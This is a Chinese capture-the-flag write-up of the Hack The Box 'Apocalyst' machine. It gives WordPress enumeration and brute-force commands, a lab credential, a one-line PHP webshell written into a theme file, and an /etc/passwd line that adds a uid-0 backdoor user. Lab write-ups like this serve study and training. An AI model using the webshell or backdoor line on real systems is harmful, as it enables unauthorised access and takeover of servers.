HTB-靶机-Apocalyst

HTB-靶机-Apocalyst

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.46

本次使用进行自动化全方位扫描

执行命令

autorecon 10.10.10.46 -o ./apocalyst-autorecon

最终的扫描结果

发现开放了两个端口，访问web应用看看

然后根据上面扫描的结果中爆破的目录有很多，目标是个WordPress程序，访问到了其后台管理地址，这里刚开始是使用IP地址访问，发现目标地址会自动访问域名，所以就添加了本地hosts

echo "10.10.10.46 apocalyst.htb" | sudo tee -a /etc/hosts.

访问正常之后，先使用wpscan把目标存在的用户跑出来

wpscan --url -e

有了用户根据目标页面生成字典再跑一下

cewl -d 0 -w brutelist.txt

使用上面的字典跑一下WordPress的用户密码

wpscan --url --usernames falaraki --passwords ./brutelist.txt

遗憾的是没有跑出来密码，那么再回到开始再次跑目录，不过这次是使用上面得到的字典去跑

gobuster dir -u -w /home/kali/Downloads/htb/apocalyst/brutelist.txt -x php -o bmfx-apocalyst.gobusters -t 100 -f -l上述跑出来显示长度和大小

根据上面跑出来的目录，经过大量访问测试，最终锁定目录/Rightiousness下访问得到的图片中使用了隐写术存放了密码字典

既然有类似字典的，那么再跑下WordPress的用户密码

wpscan --url --usernames falaraki --passwords ./list.txt

跑出了密码

| Username: falaraki, Password: Transclisiation

登录了到目标WordPress后台，发现跟之前的靶机blocky利用方式一样，具体如下

登录到目标WordPress程序找到路径/wp-content/themes/twentyseventeen/page.php 当然还有其他写webshell代码的位置，只要有权限写入即可，这里只是列举其中之一，写入如下php代码

if (isset($_GET[0])) {system($_GET[0]);}

访问 即可远程执行命令

根据上面的操作原理，制作的如下一键反弹shell代码(使用Python3执行)

也可以自己反弹shell

使用LinEnum.sh收集了提权相关的信息，发现/etc/passwd是含有写入的权限，直接添加一个uid为0的用户即可提权

bmfx:vElWaD/nKmUyw:0:0:root:/root:/bin/bash

迷茫的人生，需要不断努力，才能看清远方模糊的志向！

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。